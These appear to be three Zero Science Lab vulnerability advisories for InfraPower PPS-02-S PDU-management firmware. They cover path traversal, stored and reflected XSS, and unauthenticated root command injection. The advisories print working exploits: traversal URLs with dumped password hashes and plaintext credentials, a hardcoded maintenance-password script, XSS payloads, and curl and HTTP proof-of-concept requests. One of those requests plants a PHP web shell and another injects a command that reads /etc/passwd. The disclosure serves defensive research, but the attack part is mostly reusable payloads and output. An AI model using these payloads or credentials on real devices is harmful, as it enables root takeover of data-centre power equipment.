-rwxr--r-- 1 1013 1014 1397 Apr 22 2014 PDUDetails_Ajax_Outlet.php
-rwxr--r-- 1 1013 1014 19165 Apr 22 2014 PDULog.php
-rwxr--r-- 1 1013 1014 29883 Apr 22 2014 PDUStatus.php
-rwxr--r-- 1 1013 1014 4418 Apr 22 2014 PDUStatus_Ajax.php
-rwxr--r-- 1 1013 1014 7791 Apr 22 2014 PortSettings.php
-rwxr--r-- 1 1013 1014 24696 Apr 22 2014 SNMP.php
-rwxr--r-- 1 1013 1014 38253 Apr 22 2014 SensorDetails.php
-rwxr--r-- 1 1013 1014 27210 Apr 22 2014 SensorStatus.php
-rwxr--r-- 1 1013 1014 5984 Apr 22 2014 SensorStatus_Ajax.php
-rwxr--r-- 1 1013 1014 40944 Apr 22 2014 System.php
-rwxr--r-- 1 1013 1014 4373 Apr 22 2014 UploadEXE.php
-rwxr--r-- 1 1013 1014 9460 Apr 22 2014 User.php
-rwxr--r-- 1 1013 1014 23170 Apr 22 2014 WriteRequest.php
-rwxr--r-- 1 1013 1014 8850 Apr 22 2014 WriteRequest_Ajax.php
-rwxr--r-- 1 1013 1014 10811 Apr 22 2014 dball.php
-rwxr--r-- 1 1013 1014 771 Apr 22 2014 doupgrate.php
-rwxr--r-- 1 1013 1014 76 Apr 22 2014 index.php
-rwxr--r-- 1 1013 1014 49 Apr 22 2014 nfs.sh
-rwxr--r-- 1 1013 1014 5410 Apr 22 2014 production_test1.php
-rwxr--r-- 1 1013 1014 723 Apr 22 2014 vaildate.php
-rwxr--r-- 1 1013 1014 611 Apr 22 2014 wiseup.php
InfraPower PPS-02-S Q213V1 Local File Disclosure Vulnerability
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from a file disclosure vulnerability when
input passed thru the 'file' parameter to 'ListFile.php' script is
not properly verified before being used to read files. This can
be exploited to disclose contents of files from local resources.
-------------------------------------------------------------------
ListFile.php:
-------------
8: if(isset($_GET['file'])){
9: $handle = $_GET['file'];
10: $fp = fopen('/ramdisk/'.$handle, 'r');
11: while(!feof($fp)){
12: $tmp=fgets($fp,2000);
13: $tmp = str_replace("\n","<br />",$tmp);
14: echo $tmp;
15: }
16: fclose($fp);
17: }
-------------------------------------------------------------------
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5370
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5370.php
27.09.2016
--
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/passwd
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
http://192.168.0.17/ListFile.php?file=../../../../../../../etc/web_conf
LoginAuth 1
UserName 00000000
Password 00000000
http://192.168.0.17/ListFile.php?file=../../../../../../../mnt/mtd/password_conf
dmin 999999
manager 666666
user 111111
http://192.168.0.17/ListFile.php?file=../../../../../../../sbin/maintenance_shell.sh
#!/bin/sh
echo -n "Please enter maintenance password:"
read -s pass
InfraType=`cat /mnt/mtd/main_conf | grep "InfraType" | cut -d " " -f 2`
if [ "$InfraType" == "1" ]; then
if [ "$pass" != "InfraSolution" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "2" ]; then
if [ "$pass" != "InfraGuard" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "3" ]; then
if [ "$pass" != "InfraPower" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
if [ "$InfraType" == "4" ]; then
if [ "$pass" != "InfraCool" ]; then
echo "Invalid maintenance password!"
exit 0
fi
else
#---emergency recovery mode
echo "DEBUG su mode started!"
su
fi
fi
fi
fi
# create menu
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
while true; do
echo -n "Input Maintenance menu item number(? for help):"
read y
case $y in
"?")
echo ""
echo "***********************************************"
echo "* Maintenance Menu *"
echo "***********************************************"
echo "(1) View(vi) /mnt/mtd/main_conf "
echo "(2) View /mnt/mtd/snmp_conf "
echo "(3) View /mnt/mtd/net_conf "
echo "(4) View /mnt/mtd/web_conf "
echo "(5) Enable auto patching(boot.sh) on bootup "
echo "(6) Disable auto patching(boot.sh) on bootup "
echo "(7) Clear all patching (/mnt/mtd/patch/) "
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo "(9) Process Monitoring "
echo "(A) Patch SNMP "
echo "(B) Restore Configuration "
echo "(P) Restore INI, POL profiles "
echo "(E) Execute command line "
echo "(M) View meminfo "
echo "(X) Terminal console mode "
echo "(R) Reboot "
echo "(?) This menu "
echo "(Q) Exit "
echo "***********************************************"
;;
"1")
echo "****/mnt/mtd/main_conf******************************"
vi /mnt/mtd/main_conf
echo "****************************************************"
;;
"2")
echo "****/mnt/mtd/snmp_conf******************************"
cat /mnt/mtd/snmp_conf
echo "****************************************************"
;;
"3")
echo "****/mnt/mtd/net_conf*******************************"
cat /mnt/mtd/net_conf
echo "****************************************************"
;;
"4")
echo "****/mnt/mtd/web_conf*******************************"
cat /mnt/mtd/web_conf
echo "****************************************************"
;;
"5")
echo "(5) Enable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans5
if [ "$ans5" == "y" ]; then
if [ -f "/mnt/mtd/patch/mnt/mtd/boot.sh" ]; then
echo -n "Patching boot.sh ..."
cp /mnt/mtd/patch/mnt/mtd/boot.sh /mnt/mtd/boot.sh
chmod 777 /mnt/mtd/boot.sh
if [ -f "/mnt/mtd/boot.sh" ]; then
echo "...done"
else
echo "...fail"
fi
else
echo "file not exist: /mnt/mtd/patch/boot.sh"
fi
fi
;;
"6")
echo "(6) Disable auto patching(boot.sh) on bootup "
echo -n "Are you sure to continue? [y/n]:"
read ans6
if [ "$ans6" == "y" ]; then
if [ -f "/mnt/mtd/boot.sh" ]; then
echo -n "Disabling boot.sh pacthing..."
rm /mnt/mtd/boot.sh
echo "...done"
else
echo "File not exist: /mnt/mtd/boot.sh"
fi
fi
;;
"7")
echo "(7) Clear /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans7
if [ "$ans7" == "y" ]; then
echo -n " Removing patch files (/mnt/mtd/patch/*)..."
rm -r /mnt/mtd/patch/*
if [ ! -f "/mnt/mtd/patch/" ]; then
echo "...done"
echo -n "Reboot to apply changes? [y/n]:"
read ans7r
if [ "$ans7r" == "y" ]; then
echo "Rebooting..."
reboot
fi
else
echo "...fail"
fi
fi
;;
"8")
echo "(8) Update /www/patch/ to /mnt/mtd/patch/ "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/patch_now.sh" ]; then
chmod 777 /www/patch/patch_now.sh
sh /www/patch/patch_now.sh
else
echo "file not exist: /www/patch/patch_now.sh"
fi
fi
;;
"9")
echo "****Process List*******************************"
ps
echo "***********************************************"
;;
"A")
echo "(A) Patch SNMP "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/www/patch/snmplink.sh" ]; then
sh /www/patch/snmplink.sh
if [ -f "/www/snmplink.log" ]; then
cat /www/snmplink.log
fi
echo "Patching SNMP and its modules...done"
else
echo "file not exist: /www/patch/snmplink.sh"
fi
fi
;;
"B")
echo "(B) Restore Box Configuration(box_conf) "
echo -n "Are you sure to continue? [y/n]:"
read ans8
if [ "$ans8" == "y" ]; then
if [ -f "/etc/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf..."
cp /etc/box_conf /mnt/mtd/box_conf
if [ -f "/mnt/mtd/box_conf" ]; then
echo "Patching /mnt/mtd/box_conf...done"
else
echo "Patching /mnt/mtd/box_conf...failed"
fi
else
echo "file not exist: /etc/box_conf"
fi
fi
;;
"P")
INFRA_VER=`cat /etc/infratype_conf | grep "InfraType" | cut -d " " -f 2 | sed -e 's/^[ \t]*//' | sed -e 's/[ /t]*$//' | cut -d " " -f1`
echo "(P) Restore INI, POL profiles for $INFRA_VER "
echo -n "Are you sure to continue? [y/n]:"
read ansP
if [ "$ansP" == "y" ]; then
if [ "$InfraType" == "1" ]; then
echo "Restoring INI, POL profiles for $INFRA_VER..."
if [ -f "/etc/MF2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_ini_$INFRA_VER, Restoring..."
cp /etc/MF2_ini_$INFRA_VER /mnt/mtd/MF2_ini
echo "...done"
fi
if [ -f "/etc/MF2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/MF2_pol_$INFRA_VER, Restoring..."
cp /etc/MF2_pol_$INFRA_VER /mnt/mtd/MF2_pol
echo "...done"
fi
if [ -f "/etc/PDU3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_ini_$INFRA_VER, Restoring..."
cp /etc/PDU3_ini_$INFRA_VER /mnt/mtd/PDU3_ini
echo "...done"
fi
if [ -f "/etc/PDU3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/PDU3_pol_$INFRA_VER, Restoring..."
cp /etc/PDU3_pol_$INFRA_VER /mnt/mtd/PDU3_pol
echo "...done"
fi
if [ -f "/etc/FAN2_ini_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_ini_$INFRA_VER, Restoring..."
cp /etc/FAN2_ini_$INFRA_VER /mnt/mtd/FAN2_ini
echo "...done"
fi
if [ -f "/etc/FAN2_pol_$INFRA_VER" ]; then
echo -n "Found /etc/FAN2_pol_$INFRA_VER, Restoring..."
cp /etc/FAN2_pol_$INFRA_VER /mnt/mtd/FAN2_pol
echo "...done"
fi
if [ -f "/etc/HANDLE3_ini_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_ini_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_ini_$INFRA_VER /mnt/mtd/HANDLE3_ini
echo "...done"
fi
if [ -f "/etc/HANDLE3_pol_$INFRA_VER" ]; then
echo -n "Found /etc/HANDLE3_pol_$INFRA_VER, Restoring..."
cp /etc/HANDLE3_pol_$INFRA_VER /mnt/mtd/HANDLE3_pol
echo "...done"
fi
fi
fi
;;
"E")
echo -n "Input command line:"
read cmd_line
$cmd_line
;;
"M")
if [ -f "/mnt/mtd/log_memCheck.txt" ]; then
cat /mnt/mtd/log_memCheck.txt
fi
;;
"R")
echo "(R) Reboot "
echo -n "Are you sure to continue? [y/n]:"
read ansR
if [ "$ansR" == "y" ]; then
echo "Rebooting..."
reboot
fi
;;
"X")
echo "su mode started!"
su
;;
"Q")
echo "Leaving maintenance mode........OK"
exit 0
;;
esac
done
InfraPower PPS-02-S Q213V1 Multiple XSS Vulnerabilities
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple stored and reflected XSS vulnerabilities
when input passed via several parameters to several scripts is not properly
sanitized before being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in context of an affected
site.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5369
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5369.php
27.09.2016
--
#################################################################################
GET /SensorDetails.php?Menu=SST&DeviceID=C100"><script>alert(1)</script> HTTP/1.1
#################################################################################
POST /FWUpgrade.php HTTP/1.1
Host: 192.168.0.17
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary207OhXVwesC60pdh
Connection: close
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="FW"; filename="somefile.php<img src=x onerror=confirm(2)>"
Content-Type: text/php
t00t
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="upfile"
somefile.php
------WebKitFormBoundary207OhXVwesC60pdh
Content-Disposition: form-data; name="ID_Page"
Firmware.php?Menu=FRM
------WebKitFormBoundary207OhXVwesC60pdh--
#################################################################################
POST /SNMP.php?Menu=SMP HTTP/1.1
Host: 192.168.0.17
SNMPAgent=Enable&CommuintyString=public&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254';alert(3)//
#################################################################################
lqwrm@zslab:~#
lqwrm@zslab:~# ./scanmyphp -v -r -d infrapower -o scan_output.txt
-------------------------------------------------
PHP Source Code Security Scanner v0.2
(c) Zero Science Lab - http://www.zeroscience.mk
Tue Sep 27 10:35:52 CEST 2016
-------------------------------------------------
Scanning recursively...Done.
dball.php:
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_REQUEST'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$Table'
doupgrate.php:
Line 11: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 12: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 15: Command Injection in 'system' via '$_POST'
Line 16: Command Injection in 'system' via '$_POST'
Line 19: Command Injection in 'system' via '$_POST'
Firmware.php:
Line 166: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
Function.php:
Line 257: Header Injection in 'header' via '$_SERVER'
Line 267: Header Injection in 'header' via '$_SERVER'
FWUpgrade.php:
Line 39: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 43: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 44: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 45: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 46: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
index.php:
Line 2: Header Injection in 'header' via '$_SERVER'
IPSettings.php:
Warning: ereg() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Warning: split() function deprecated in PHP => 5.3.0. Relying on this feature is highly discouraged.
Line 117: Command Injection in 'exec' via '$IP_setting'
Line 117: Command Injection in 'exec' via '$Netmask_setting'
Line 123: Command Injection in 'exec' via '$Gateway_setting'
ListFile.php:
Line 12: PHP File Inclusion in 'fgets' via '$fp'
Login.php:
Line 151: Command Injection in 'shell_exec' via '$_POST'
Ntp.php:
Line 46: Command Injection in 'exec' via '$idx'
OutletDetails.php:
Line 78: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 241: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 623: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 674: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 730: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 732: Cross-Site Scripting (XSS) in 'echo' via '$row'
Line 914: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
PDUStatus.php:
Line 625: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
production_test1.php:
Line 6: Command Injection in 'shell_exec' via '$_POST'
Line 45: Command Injection in 'proc_open' via '$_ENV'
SensorDetails.php:
Line 844: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 896: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
Line 1233: Cross-Site Scripting (XSS) in 'echo' via '$DeviceID'
SensorStatus.php:
Line 695: Cross-Site Scripting (XSS) in 'echo' via '$_SERVER'
SNMP.php:
Line 41: Command Injection in 'exec' via '$_POST'
System.php:
Line 54: Header Injection in 'header' via '$_SERVER'
Line 64: Header Injection in 'header' via '$_SERVER'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 99: Command Injection in 'exec' via '$datetime'
Line 185: Command Injection in 'exec' via '$TimeServer'
Line 286: Command Injection in 'exec' via '$IP_setting'
Line 286: Command Injection in 'exec' via '$Netmask_setting'
Line 292: Command Injection in 'exec' via '$Gateway_setting'
UploadEXE.php:
Line 74: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 76: Cross-Site Scripting (XSS) in 'echo' via '$_FILES'
Line 82: Command Injection in 'popen' via '$_FILES'
Line 96: PHP File Inclusion in 'fgets' via '$fp'
Line 96: PHP File Inclusion in 'fgets' via '$buffer'
WriteRequest.php:
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$_POST'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
Line 96: Cross-Site Scripting (XSS) in 'echo' via '$Page'
-----------------------------------------------------
Scan finished. Check results in scan_output.txt file.
lqwrm@zslab:~#
InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Vendor: Austin Hughes Electronics Ltd.
Product web page: http://www.austin-hughes.com
Affected version: Q213V1 (Firmware: V2395S)
Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
Patented IP Dongle provides IP remote access to the PDUs by a true
network IP address chain. Only 1xIP dongle allows access to max. 16
PDUs in daisy chain - which is a highly efficient cient application
for saving not only the IP remote accessories cost, but also the true
IP addresses required on the PDU management.
Desc: InfraPower suffers from multiple unauthenticated remote command
injection vulnerabilities. The vulnerability exist due to several POST
parameters in several scripts not being sanitized when using the exec(),
proc_open(), popen() and shell_exec() PHP function while updating the
settings on the affected device. This allows the attacker to execute
arbitrary system commands as the root user and bypass access controls in
place.
Tested on: Linux 2.6.28 (armv5tel)
lighttpd/1.4.30-devel-1321
PHP/5.3.9
SQLite/3.7.10
Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5372
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php
27.09.2016
--
doupgrate.php:
--------------
09: <?
10: echo "Firmware Upgrate Using NFS:<BR>";
11: echo "IP=".$_POST["ipaddr"]."<BR>";
12: echo "Firmware Name=".$_POST["fwname"]."<BR>";
13: system("sh nfs.sh");
14: echo "Mounting NFS<BR>";
15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs");
16: system("cp /nfs/".$_POST["fwname"]." /");
17: echo "Flash erasing<BR>";
18: system("@flash_eraseall /dev/mtd0");
19: system("cp /".$_POST["fwname"]." /dev/mtd0");
20: echo "Upgrate done<BR>";
21: system("umount /nfs");
22: echo "Reboot system<BR>";
23: system("reboot");
24: ?>
---------------------------------------------------------------------
IPSettings.php:
---------------
83: $IP_setting = ereg_ip($_POST['IP']);
84: $Netmask_setting = ereg_ip($_POST['Netmask']);
85: $Gateway_setting = ereg_ip($_POST['Gateway']);
...
...
110: $fout = fopen("/mnt/mtd/net_conf", "w");
111: if($fout){
112: $output = substr($output, 0, -1);
113: fprintf($fout, "%s", $output);
114: //echo $change_ip.'b';
115: if($change_ip === '1'){
116: $str = '';
117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
118: // echo $str."\n";
119: }
120: if($change_gw === '1'){
121: $str = '';
122: exec('ip route del default', $str);
123: exec('route add default gw '.$Gateway_setting, $str);
124: // echo $str[0]."a\n";
125: }
126: }
127: fclose($fout);
...
...
164: function ereg_ip($ipstring){
165: $ipstring=trim($ipstring); //移除前後空白
166: //格式錯誤
167: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
168: //內容檢查
169: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
170: foreach($ip_segment as $k =>$v){
171: if($v >255){
171: return 0;
172: }
173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
174: } //end foreach
175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
176: return $ipstring;
177: }
---------------------------------------------------------------------
Login.php:
----------
126: $UserName = getConf("/mnt/mtd/web_conf", "UserName");
127: $Password = getConf("/mnt/mtd/web_conf", "Password");
128:
129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password;
130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){
...
...
140: $_SESSION['Login'] = $_POST['ID_User'];
141:
142: //Login
143: $loginTime = date("Y-m-d,H:i:s.0,P");
144: $remoteIP = $_SERVER['REMOTE_ADDR'];
145: //----------SNMP checking ---Ed 20130307------------------------<
146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable");
147: if ($SNMPEnable == "1") {
148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap");
149: if ($TrapEnable == "v2Trap") {
150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP");
151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' \'\' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"');
152: //echo "alert($res);";
153: }
154: }
---------------------------------------------------------------------
Ntp.php:
--------
36: <?php
37: if(empty($_POST['Change']))
38: $tzone='8';
39: else
40: {
41:
42: $tzone=$_POST['ID_timezone'];
43: $idx=$tzone+12;
44: echo "update status...";
45: exec("/usr/bin/ntpclient -s -h 220.130.158.71");
46: exec("/usr/bin/zonegen ".$idx);
47: exec("/usr/bin/zic -d /usr/bin/ zonetime");
48: exec("mv /usr/bin/localtime /etc/localtime");
49: echo "OK";
50: }
51: ?>
---------------------------------------------------------------------
production_test1.php:
---------------------
4: if( isset($_POST['macAddress']) )
5: {
6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr");
7: $mac = shell_exec("cat /mnt/mtd/mac_addr");
8: /*$result = $fail;
9: echo $mac . ",";
10: echo $_POST['macAddress'];
11: if( !strcmp($mac,$_POST['macAddress']) )
12: $result = $success;
13: echo "verify - " . $mac . " - " . $result;*/
14: echo "verify - " . $mac;
15:
16: exit();
17: }
---------------------------------------------------------------------
SNMP.php:
---------
34: if($_POST["SNMPAgent"] === "Enable"){
35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`');
36: setConf("/mnt/mtd/snmp_conf", "enable", "1");
37:
38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"]))
39: {
40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf");
41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf");
42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]);
43: setSnmpConf(1,$_POST["CommuintyString"]);
44: setSnmpConf(2,$_POST["CommuintyWrite"]);
45: $pCommunity = $_POST["CommuintyString"];
46: }
---------------------------------------------------------------------
System.php:
-----------
86: if(!empty($_POST['ChangeTime']) == "1"){
87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){
88:
89: //Ray modify
90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year']));
91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second'];
92:
93:
94: if(isset($_POST['TimeZone'])){
95: setTimeZone($_POST['TimeZone']);
96: $orgZone = $_POST['TimeZone'];
97: }
98:
99: exec('date '.$datetime);
100: exec('hwclock -w');
101: exec('hwclock -w -f /dev/rtc1');
...
...
180: if(isset($_POST['TimeServer'])){
181: //$TimeServer = ereg_ip($_POST['TimeServer']);
182: if(!empty($_POST['TimeServer'])){
183: $TimeServer = $_POST['TimeServer'];
184:
185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1");
...
...
286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str);
...
...
292: exec('route add default gw '.$Gateway_setting, $str);
...
...
336: function ereg_ip($ipstring){
337: $ipstring=trim($ipstring); //移除前後空白
338: //格式錯誤
339: if(!ereg("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$",$ipstring))return 0;
340: //內容檢查
341: $ip_segment =split("\.",$ipstring); //注意一定要加 "\",否則會分不開。
342: foreach($ip_segment as $k =>$v){
343: if($v >255){
344: return 0;
345: }
346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ip中的0,ex:1.020.003.004 =>1.20.3.4
347: } //end foreach
348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //將字串$ip處理
349: return $ipstring;
350: }
---------------------------------------------------------------------
UploadEXE.php:
--------------
72: if(isset($_POST['hasFile'])){
73: if ($_FILES['ExeFile']['error'] > 0){
74: echo 'Error: ' . $_FILES['FW']['error'];
75: }else{
76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>';
...
...
80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']);
81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777");
82: $fp = popen("\"/ramdisk/".$_FILES['ExeFile']['name']."\"", "r");
---------------------------------------------------------------------
---------------------------------------------------------------------
---------------------------------------------------------------------
#1
--
PoC Request:
curl -i -s -k -X 'POST' \
-H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' \
--data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=192.168.0.254' \
'https://192.168.0.17/SNMP.php?Menu=SMP'
...
curl -k https://192.168.0.17/test251.php?c=whoami;echo " at ";uname -a
Response:
root
at
Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown
#2
--
PoC Request:
POST /production_test1.php HTTP/1.1
Host: 192.168.0.17
User-Agent: ZSL-Injectinator/3.1 (Unix)
Content-Type: application/x-www-form-urlencoded
Connection: close
macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd
Response:
HTTP/1.1 200 OK
X-Powered-By: PHP/5.3.9
Content-type: text/html
Connection: close
Date: Fri, 17 Jan 2003 16:58:52 GMT
Server: lighttpd/1.4.30-devel-1321
Content-Length: 751
